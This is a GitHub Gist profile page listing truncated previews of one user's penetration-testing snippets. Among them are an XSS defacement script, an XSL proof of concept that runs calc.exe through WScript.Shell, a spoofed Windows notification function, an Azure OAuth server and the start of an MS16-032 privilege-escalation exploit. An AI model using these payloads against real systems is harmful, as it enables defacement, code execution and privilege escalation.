Skip to content

Instantly share code, notes, and snippets.


Michael Benich benichmt1

View GitHub Profile
View stallowned.js
var title = "XSS Defacement";
var bgcolor = "#000000";
var image_url = "";
var text = "This page has been Hacked!";
var font_color = "#FF0000";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
document.title = pageTitle;
View calc.xsl
<?xml version='1.0'?>
xmlns="" xmlns:ms="urn:schemas-microsoft-com:xslt"
<output method="text"/>
<ms:script implements-prefix="user" language="Jscript">
var x = new ActiveXObject("WScript.Shell").Run("calc.exe");
benichmt1 / oauthServer.go
Last active Nov 16, 2017 — forked from staaldraad/oauthServer.go
A mini OAuth server for Azure
View oauthServer.go
package main
import (
benichmt1 / wlrmdr.ps1
Created Jun 5, 2017
Windows Logon Reminder Balloon
View wlrmdr.ps1
function Invoke-Wlrmdr {
Param (
[Parameter(Mandatory = $True, Position = 0)]
[String] $Message = "You are using pirated Windows",
[Parameter(Mandatory = $True, Position = 1)]
[String] $IconType = 'Key',
[Parameter(Mandatory = $True, Position = 2)]
[String] $Title = 'Windows Explorer'
benichmt1 /
Last active Feb 14, 2019
Google Scraper to replace FOCA
# requirements: selenium wget python 2.7
import time
import sys
import wget
from selenium import webdriver
from import By
from import WebDriverWait
from import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
View MS16-032.ps1
function Invoke-MS16-032 {
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script.
Modifications by Mike Benich (@benichmt1).
benichmt1 /
Created Jun 16, 2016
Extracting user IDs from Burp output
import re
file = open("/root/Desktop/enum.txt","r")
out = open("enum-out.txt","w")
text =
m = re.findall(r'workgroup%5C(\w+)',text)
if m:
print ("\n".join(m))
View gist:3b11c2829f19b7450ea9
### Keybase proof
I hereby claim:
* I am benichmt1 on github.
* I am benichmt1 ( on keybase.
* I have a public key whose fingerprint is 25ED DBC4 1F27 0809 F976 591E 77BE 66D2 2608 12C9
To claim this, I am signing this object: